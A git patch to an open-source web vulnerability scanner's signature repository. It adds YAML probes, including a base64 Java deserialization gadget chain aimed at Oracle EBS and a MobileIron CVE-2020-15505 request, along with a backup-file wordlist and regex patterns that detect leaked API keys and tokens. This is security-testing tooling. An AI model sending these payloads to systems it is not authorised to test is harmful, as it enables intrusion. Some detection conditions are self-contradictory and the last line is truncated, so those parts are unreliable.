From 4c79945bac422d3600c2e644fd0434ad39632118 Mon Sep 17 00:00:00 2001 From: j3ssie Date: Wed, 23 Sep 2020 00:05:35 +0700 Subject: [PATCH] Update some signatures --- .github/FUNDING.yml | 12 ++ README.md | 28 ++++ common/oracle-ebs-desr copy.yaml | 29 ++++ cves/mobileiron-rce-probe.yaml | 31 ++++ mics/passive-on-success.yaml | 19 +++ mics/passive-only.yaml | 20 +++ mics/proxy-with-condition.yaml | 25 +++ mics/reachable.yaml | 1 - passives/api-key.yaml | 262 +++++++++++++++++++++++++++++++ passives/common.yaml | 27 ++++ sensitive/svnleak.yaml | 3 +- sensitive/zip-backup-file.yaml | 105 +++++++++++++ 12 files changed, 560 insertions(+), 2 deletions(-) create mode 100644 .github/FUNDING.yml create mode 100644 common/oracle-ebs-desr copy.yaml create mode 100644 cves/mobileiron-rce-probe.yaml create mode 100644 mics/passive-on-success.yaml create mode 100644 mics/passive-only.yaml create mode 100644 mics/proxy-with-condition.yaml create mode 100644 passives/api-key.yaml create mode 100644 passives/common.yaml create mode 100644 sensitive/zip-backup-file.yaml diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml new file mode 100644 index 0000000..c22d61c --- /dev/null +++ b/.github/FUNDING.yml @@ -0,0 +1,12 @@ +# These are supported funding model platforms + +github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2] +patreon: j3ssie +open_collective: jaeles-project +ko_fi: # Replace with a single Ko-fi username +tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel +community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry +liberapay: # Replace with a single Liberapay username +issuehunt: # Replace with a single IssueHunt username +otechie: # Replace with a single Otechie username +custom: [ 'https://paypal.me/j3ssiejjj' ] diff --git a/README.md b/README.md index e854954..aff73ae 100644 --- a/README.md +++ b/README.md @@ -23,6 +23,12 @@ ### Installation +``` +jaeles config init +``` + +Or + Try to clone signatures folder to somewhere like this ``` git clone --depth=1 https://github.com/jaeles-project/jaeles-signatures /tmp/jaeles-signatures/ @@ -56,6 +62,28 @@ Examples: jaeles scan -v -s '~/my-signatures/products/wordpress/.*' -u 'https://wp.example.com/blog/' -p 'root=[[.URL]]' cat urls.txt | grep 'interesting' | jaeles scan -c 50 -s /tmp/jaeles-signatures/cves/sample.yaml -U list_of_urls.txt --proxy http://127.0.0.1:8080 +Config Command examples: + # Init default signatures + jaeles config init + + # Update latest signatures + jaeles config update + jaeles config update --repo http://github.com/jaeles-project/another-signatures --user admin --pass admin + jaeles config update --repo git@github.com/jaeles-project/another-signatures -K your_private_key + + # Reload signatures from a standard signatures folder (contain passives + resources) + jaeles config reload --signDir ~/standard-signatures/ + + # Add custom signatures from folder + jaeles config add --signDir ~/custom-signatures/ + + # Clean old stuff + jaeles config clean + + # More examples + jaeles config add --signDir /tmp/standard-signatures/ + jaeles config cred --user sample --pass not123456 + ``` *** diff --git a/common/oracle-ebs-desr copy.yaml b/common/oracle-ebs-desr copy.yaml new file mode 100644 index 0000000..0f34947 --- /dev/null +++ b/common/oracle-ebs-desr copy.yaml @@ -0,0 +1,29 @@ +id: oracle-ebs-desr +info: + name: Oracle EBS Deserialization + risk: High + confidence: Tentative + +params: + - root: "{{.BaseURL}}" + - data: "rO0ABXNyADJzdW4ucmVmbGVjdC5hbm5vdGF0aW9uLkFubm90YXRpb25JbnZvY2F0aW9uSGFuZGxlclXK9Q8Vy36lAgACTAAMbWVtYmVyVmFsdWVzdAAPTGphdmEvdXRpbC9NYXA7TAAEdHlwZXQAEUxqYXZhL2xhbmcvQ2xhc3M7eHBzfQAAAAEADWphdmEudXRpbC5NYXB4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcQB+AABzcgAqb3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLm1hcC5MYXp5TWFwbuWUgp55EJQDAAFMAAdmYWN0b3J5dAAsTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHNyADpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ2hhaW5lZFRyYW5zZm9ybWVyMMeX7Ch6lwQCAAFbAA1pVHJhbnNmb3JtZXJzdAAtW0xvcmcvYXBhY2hlL2NvbW1vbnMvY29sbGVjdGlvbnMvVHJhbnNmb3JtZXI7eHB1cgAtW0xvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuVHJhbnNmb3JtZXI7vVYq8dg0GJkCAAB4cAAAAARzcgA7b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkNvbnN0YW50VHJhbnNmb3JtZXJYdpARQQKxlAIAAUwACWlDb25zdGFudHQAEkxqYXZhL2xhbmcvT2JqZWN0O3hwdnIAEGphdmEubGFuZy5UaHJlYWQAAAAAAAAAAAAAAHhwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5JbnZva2VyVHJhbnNmb3JtZXKH6P9re3zOOAIAA1sABWlBcmdzdAATW0xqYXZhL2xhbmcvT2JqZWN0O0wAC2lNZXRob2ROYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7WwALaVBhcmFtVHlwZXN0ABJbTGphdmEvbGFuZy9DbGFzczt4cHVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAJ0AAVzbGVlcHVyABJbTGphdmEubGFuZy5DbGFzczurFteuy81amQIAAHhwAAAAAXZyAARsb25nAAAAAAAAAAAAAAB4cHQACWdldE1ldGhvZHVxAH4AHgAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB+AB5zcQB+ABZ1cQB+ABsAAAACdXEAfgAeAAAAAXEAfgAhdXEAfgAbAAAAAXNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAnEHQABmludm9rZXVxAH4AHgAAAAJ2cgAQamF2YS5sYW5nLk9iamVjdAAAAAAAAAAAAAAAeHB2cQB+ABtzcQB+ABFzcgARamF2YS5sYW5nLkludGVnZXIS4qCk94GHOAIAAUkABXZhbHVleHEAfgAsAAAAAXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAABAAAAAAeHh2cgASamF2YS5sYW5nLk92ZXJyaWRlAAAAAAAAAAAAAAB4cHEAfgA5" + +requests: + - method: POST + redirect: false + url: >- + {{.root}}/OA_HTML/iesRuntimeServlet + headers: + - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + body: | + {{ .data | b64dec }} + detections: + - >- + StatusCode() == 200 && ResponseTime() > 9 && StringSearch("body", "java.lang") + +references: + - links: + - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf + - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf + - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf + - https://github.com/sahabrifki/erpscan/blob/master/javaSerDetect.py \ No newline at end of file diff --git a/cves/mobileiron-rce-probe.yaml b/cves/mobileiron-rce-probe.yaml new file mode 100644 index 0000000..aedb7b5 --- /dev/null +++ b/cves/mobileiron-rce-probe.yaml @@ -0,0 +1,31 @@ +id: mobileiron-rce-probe +info: + name: Mobileiron RCE Probe CVE-2020-15505 + risk: Potential + +params: + - root: '{{.BaseURL}}' + - desr: 'YwIASAAEdGVzdE0=' + +variables: + - endpoint: | + /mifs/.;/services/LogService + +requests: + - method: POST + redirect: false + url: >- + {{.root}}{{.endpoint}} + headers: + - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + - Content-Type: x-application/hessian + - Referer: '{{.BaseURL}}' + body: | + {{ .desr | b64dec }} + detections: + - >- + StatusCode() == 200 && StringSearch("response", "application/x-hessian") && ContentLength('body') == 0 + +references: + - blog: https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html + - poc: https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505 \ No newline at end of file diff --git a/mics/passive-on-success.yaml b/mics/passive-on-success.yaml new file mode 100644 index 0000000..ac3ca8f --- /dev/null +++ b/mics/passive-on-success.yaml @@ -0,0 +1,19 @@ +id: passive-on-success +info: + name: Passive on success HTTP + +params: + - root: '{{.Raw}}' + - me: 'GET' + +requests: + - method: GET + url: >- + {{.root}} + headers: + - User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55' + # Only do passive check if response is 200 + detections: + - >- + StatusCode() == 200 && ContentLength("body") > 100 && DoPassive() + diff --git a/mics/passive-only.yaml b/mics/passive-only.yaml new file mode 100644 index 0000000..1a26a41 --- /dev/null +++ b/mics/passive-only.yaml @@ -0,0 +1,20 @@ +id: passive-only +passive: true +info: + name: Passive only + +params: + - root: '{{.Raw}}' + - me: 'GET' + +# Useful for use only passive mode +requests: + - method: '{{.me}}' + url: >- + {{.root}} + headers: + - User-Agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55' + # No detections + # detections: + # - >- + # 1 == 2 diff --git a/mics/proxy-with-condition.yaml b/mics/proxy-with-condition.yaml new file mode 100644 index 0000000..8b25f4a --- /dev/null +++ b/mics/proxy-with-condition.yaml @@ -0,0 +1,25 @@ +id: proxy-with-condition +single: true +info: + name: Proxy with condition + risk: Info + confidence: Tentative + +# Used for +requests: + - method: GET + redirect: true + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + url: >- + {{.Raw}} + conclusions: + - SetValue("match", StatusCode() == 200 && !RegexSearch("body", "(?i)(Oops!|Whoops!|not\sfound|Request\sRejected|Access\sDenied|a\sbad\sURL|has\sbeen\slocked)") && ContentLength('body') > 100) + + # pass to proxy if pass condition + - conditions: + - ValueOf("match") == "true" + method: GET + proxy: 'http://127.0.0.1:8080' + url: >- + {{.Raw}} \ No newline at end of file diff --git a/mics/reachable.yaml b/mics/reachable.yaml index 09e2a3a..a5a3463 100644 --- a/mics/reachable.yaml +++ b/mics/reachable.yaml @@ -1,4 +1,3 @@ -# info to search signature id: mics-01-05 passive: true info: diff --git a/passives/api-key.yaml b/passives/api-key.yaml new file mode 100644 index 0000000..466269e --- /dev/null +++ b/passives/api-key.yaml @@ -0,0 +1,262 @@ +name: "api key pattern" +desc: "grep for api key pattern" +risk: "High" +level: 1 +rules: + - id: api-key-01 + reason: "Artifactory" + detections: + - >- + RegexSearch("response", "(?i)artifactory.{0,50}(\\\"|'|`)?[a-zA-Z0-9=]{112}(\\\"|'|`)?") + + - id: api-key-02 + reason: "Code Clima" + detections: + - >- + RegexSearch("response", "(?i)codeclima.{0,50}(\\\"|'|`)?[0-9a-f]{64}(\\\"|'|`)?") + + - id: api-key-03 + reason: "Facebook Access Token" + detections: + - >- + RegexSearch("response", "EAACEdEose0cBA[0-9A-Za-z]+") + + - id: api-key-04 + reason: "Facebook Access Token Base64" + detections: + - >- + RegexSearch("response", "RUFBQ0VkRW9zZTBjQk[%a-zA-Z0-9+/]+={0,2}") + + - id: api-key-05 + reason: "Facebook Oauth" + detections: + - >- + RegexSearch("response", "(?i)facebook[^/]{0,50}(\\\"|'|`)?[0-9a-f]{32}(\\\"|'|`)?") + + - id: api-key-06 + reason: "Google (GCP) Service-account" + detections: + - >- + RegexSearch("response", "((\\\"|'|`)?type(\\\"|'|`)?\\\\s{0,50}(:|=>|=)\\\\s{0,50}(\\\"|'|`)?service_account(\\\"|'|`)?,?)") + + - id: api-key-07 + reason: "Google API Key" + detections: + - >- + RegexSearch("response", "AIza[0-9A-Za-z\\-_]{35}") + + - id: api-key-08 + reason: "Google API Key Base64" + detections: + - >- + RegexSearch("response", "QUl6Y[%a-zA-Z0-9+/]{47}") + + - id: api-key-09 + reason: "Google OAuth" + detections: + - >- + RegexSearch("response", "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com") + + # - id: api-key-10 + # reason: "Google Recaptcha key" + # detections: + # - >- + # RegexSearch("response", "6L[0-9A-Za-z-_]{38}") + + - id: api-key-11 + reason: "Google OAuth Access Token" + detections: + - >- + RegexSearch("response", "ya29\\.[0-9A-Za-z\\-_]+") + + - id: api-key-12 + reason: "Google Oauth" + detections: + - >- + RegexSearch("response", "((\\\"|'|`)?client_secret(\\\"|'|`)?\\\\s{0,50}(:|=>|=)\\\\s{0,50}(\\\"|'|`)?[a-zA-Z0-9-_]{24}(\\\"|'|`)?)") + + - id: api-key-13 + reason: "Heroku API Key" + detections: + - >- + RegexSearch("response", "(?i)heroku.{0,50}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}") + + - id: api-key-14 + reason: "Hockeyapp" + detections: + - >- + RegexSearch("response", "(?i)hockey.{0,50}(\\\"|'|`)?[0-9a-f]{32}(\\\"|'|`)?") + + - id: api-key-15 + reason: "MailChimp API Key" + detections: + - >- + RegexSearch("response", "[0-9a-f]{32}-us[0-9]{1,2}") + + - id: api-key-16 + reason: "Mailgun API Key" + detections: + - >- + RegexSearch("response", "key-[0-9a-zA-Z]{32}") + + - id: api-key-17 + reason: "NuGet API Key" + detections: + - >- + RegexSearch("response", "oy2[a-z0-9]{43}") + + - id: api-key-18 + reason: "Outlook team" + detections: + - >- + RegexSearch("response", "https\\://outlook\\.office.com/webhook/[0-9a-f-]{36}\\@") + + - id: api-key-19 + reason: "PayPal Braintree Access Token" + detections: + - >- + RegexSearch("response", "access_token\\$(live|production)\\$[0-9a-z]{16}\\$[0-9a-f]{32}") + + - id: api-key-20 + reason: "Sauce" + detections: + - >- + RegexSearch("response", "(?i)sauce.{0,50}(\\\"|'|`)?[0-9a-f-]{36}(\\\"|'|`)?") + + - id: api-key-21 + reason: "Slack Token" + detections: + - >- + RegexSearch("response", "(xox[pboa]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})") + + - id: api-key-22 + reason: "Slack Webhook" + detections: + - >- + RegexSearch("response", "https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}") + + - id: api-key-23 + reason: "Sonar" + detections: + - >- + RegexSearch("response", "(?i)sonar.{0,50}(\\\"|'|`)?[0-9a-f]{40}(\\\"|'|`)?") + + - id: api-key-24 + reason: "Square Access Token" + detections: + - >- + RegexSearch("response", "sq0atp-[0-9A-Za-z\\-_]{22}") + + - id: api-key-25 + reason: "Square OAuth Secret" + detections: + - >- + RegexSearch("response", "sq0csp-[0-9A-Za-z\\-_]{43}") + + - id: api-key-26 + reason: "Stripe API Key" + detections: + - >- + RegexSearch("response", "sk_live_[0-9a-zA-Z]{24}") + + - id: api-key-27 + reason: "Stripe Restricted API Key" + detections: + - >- + RegexSearch("response", "rk_live_[0-9a-zA-Z]{24}") + + - id: api-key-28 + reason: "Picatic API Key" + detections: + - >- + RegexSearch("response", "sk_live_[0-9a-z]{32}") + + - id: api-key-29 + reason: "SendGrid API Key" + detections: + - >- + RegexSearch("response", "SG\\.[\\w_]{16,32}\\.[\\w_]{16,64}") + + - id: api-key-30 + reason: "LinkedIn Client ID" + detections: + - >- + RegexSearch("response", "(?i)linkedin(.{0,20})?(?-i)['\"][0-9a-z]{12}['\"]") + + - id: api-key-31 + reason: "LinkedIn Secret Key" + detections: + - >- + RegexSearch("response", "(?i)linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]") + + - id: api-key-32 + reason: "Cloudinary Basic Auth" + detections: + - >- + RegexSearch("response", "(?i)cloudinary:\/\/[0-9]{15}:[0-9A-Za-z]+@[a-z]+") + + - id: api-key-33 + reason: "WP-Config" + detections: + - >- + RegexSearch("response", "define(.{0,20})?(DB_CHARSET|NONCE_SALT|LOGGED_IN_SALT|AUTH_SALT|NONCE_KEY|DB_HOST|DB_PASSWORD|AUTH_KEY|SECURE_AUTH_KEY|LOGGED_IN_KEY|DB_NAME|DB_USER)(.{0,20})?['|\"].{10,120}['|\"]") + + - id: api-key-34 + reason: "Surge" + detections: + - >- + RegexSearch("response", "(?i)surge.{0,50}(\\\"|'|`)?[0-9a-f]{32}(\\\"|'|`)?") + + - id: api-key-35 + reason: "Twilio API Key" + detections: + - >- + RegexSearch("response", "SK[0-9a-fA-F]{32}") + + - id: api-key-36 + reason: "Twitter Oauth" + detections: + - >- + RegexSearch("response", "(?i)twitter[^/]{0,50}[0-9a-zA-Z]{35,44}") + + - id: api-key-37 + reason: "Password in URL" + detections: + - >- + RegexSearch("response", "[a-zA-Z]{3,10}://[^/\\s:@]{3,20}:[^/\\s:@]{3,20}@.{1,100}[\"'\\s]") + + - id: api-key-38 + reason: "Tenable key" + detections: + - >- + RegexSearch("response", "(?i)['\"]?[a-z-_]*(tenable|nessus)[a-z-_]*['\"]?\\s*[=:]\\s*['\"]?\\w{64}['\"]?\\s*,?\\s*$") + + - id: api-key-39 + reason: "Github Access Token" + detections: + - >- + RegexSearch("response", "(?i)github(.{0,20})?(?-i)['\"][0-9a-zA-Z]{35,40}['\"]") + + - id: api-key-40 + reason: "Github Access Token 2" + detections: + - >- + RegexSearch("response", "[a-zA-Z0-9_-]*:[a-zA-Z0-9_\\-]+@github\\.com*") + + - id: api-key-41 + reason: "S3 Bucket" + detections: + - >- + RegexSearch("response", "[a-z0-9.-]+\\.s3\\.amazonaws\\.com|[a-z0-9.-]+\\.s3-[a-z0-9-]\\.amazonaws\\.com|[a-z0-9.-]+\\.s3-website[.-](eu|ap|us|ca|sa|cn)|//s3\\.amazonaws\\.com/[a-z0-9._-]+|//s3-[a-z0-9-]+\\.amazonaws\\.com/[a-z0-9._-]+") + + - id: api-key-42 + reason: "Json Web Token" + detections: + - >- + RegexSearch("response", "ey[A-Za-z0-9_=-]+\\.ey[A-Za-z0-9_=-]+\\.?[A-Za-z0-9_.+/=-]*") + + - id: api-key-43 + reason: "Authorization Header" + detections: + - >- + RegexSearch("response", "^(Bearer|Basic) [a-zA-Z0-9_=-]+$") diff --git a/passives/common.yaml b/passives/common.yaml new file mode 100644 index 0000000..94b3d20 --- /dev/null +++ b/passives/common.yaml @@ -0,0 +1,27 @@ +name: "common pattern" +desc: "grep for common interesting pattern" +risk: "Medium" +level: 1 +rules: + - id: directory-listing-01 + reason: "Directory Listing" + detections: + - >- + StatusCode() < 300 && StatusCode() >= 500 && StringSearch("body", 'Index of /') && StringSearch("body", '>Last Modified<') + - id: sensitive-php-01 + reason: "PHP Info" + detections: + - >- + StatusCode() < 300 && StatusCode() >= 500 && StringSearch("body", 'PHP Configuration') && StringSearch("body", 'phpinfo()') + + - id: sensitive-debug-01 + reason: "Debug Page" + detections: + - >- + StatusCode() < 300 && StatusCode() >= 500 && RegexSearch("body", "(Application-Trace|Routing Error|DEBUG\"? ?[=:] ?True|Caused by:|stack trace:|Microsoft .NET Framework|Traceback|[0-9]:in `|#!/us|WebApplicationException|java\\.lang\\.|phpinfo|swaggerUi|on line [0-9]|SQLSTATE)") + + - id: sensitive-firebase-01 + reason: "Firebase detected" + detections: + - >- + StatusCode() < 300 && StatusCode() >= 500 && RegexSearch("response", "firebaseio.com") diff --git a/sensitive/svnleak.yaml b/sensitive/svnleak.yaml index 2715383..340b170 100644 --- a/sensitive/svnleak.yaml +++ b/sensitive/svnleak.yaml @@ -1,4 +1,5 @@ -id: svn-leak-01 +id: svn-leak +donce: true info: name: SVN Leak Source risk: Medium diff --git a/sensitive/zip-backup-file.yaml b/sensitive/zip-backup-file.yaml new file mode 100644 index 0000000..951af0e --- /dev/null +++ b/sensitive/zip-backup-file.yaml @@ -0,0 +1,105 @@ +id: sensitive-zip-file +donce: true +info: + name: Common ZIP Backup File + risk: Potential + confidence: Tentative + +params: + - root: "{{.BaseURL}}" + +origin: + method: GET + redirect: false + headers: + - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + url: >- + {{.BaseURL}}/hopefully404get.zip + +variables: + - secret: | + .0.zip + .2.zip + .org.zip + .zip + 1.sql.zip + 1.zip + 2.zip + 2010.zip + 2011.zip + 2012.zip + 2013.zip + 2014.zip + 2015.zip + 2016.zip + 2017.zip + 2018.zip + 2019.zip + Library.zip + archive.zip + backup.sql.zip + backup.zip + backups.zip + classes.zip + clients.zip + cstartup.zip + dat.zip + data.sql.zip + data.zip + databack.zip + databackup.zip + databak.zip + db.sql.zip + db.zip + db_backup.sql.zip + db_backup.zip + dbadmin.sql.zip + dbadmin.zip + dbase.sql.zip + dbase.zip + dbdump.sql.zip + dbdump.zip + dump.sql.zip + dump.zip + eroticos.zip + forum.zip + home.sql.zip + home.zip + i.zip + images.zip + index.zip + joomla.zip + js.zip + library.zip + mysql.sql.zip + mysql.zip + oldsite.zip + photos.zip + qs.zip + site.sql.zip + sql.sql.zip + sql.zip + temp.sql.zip + test.zip + upload.sql.zip + users.sql.zip + users.zip + vb.zip + web.sql.zip + web.zip + wp.zip + ws.zip + www.sql.zip + www.zip + wwwroot.zip + +requests: + - method: GET + redirect: false + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + url: >- + {{.root}}/{{.secret}} + detections: + - >- + StatusCode() == 200 && !RegexSearch("response", "(?i)(Oops!|Whoops!|AutodiscoverService|not\sfound|Request\sRejected|Access\sDenied|a\sbad\sURL|has\sbeen\slocked)") && (RegexSearch("resHeaders", ".*Content-Type:.*octet-stream") || RegexSearch("resHeaders", "text/plain")) && (Math.abs(ContentLength() - OriginContentLength()) > 100) && !RegexSearch("body", "(?i)(\<\!doctype|\ 100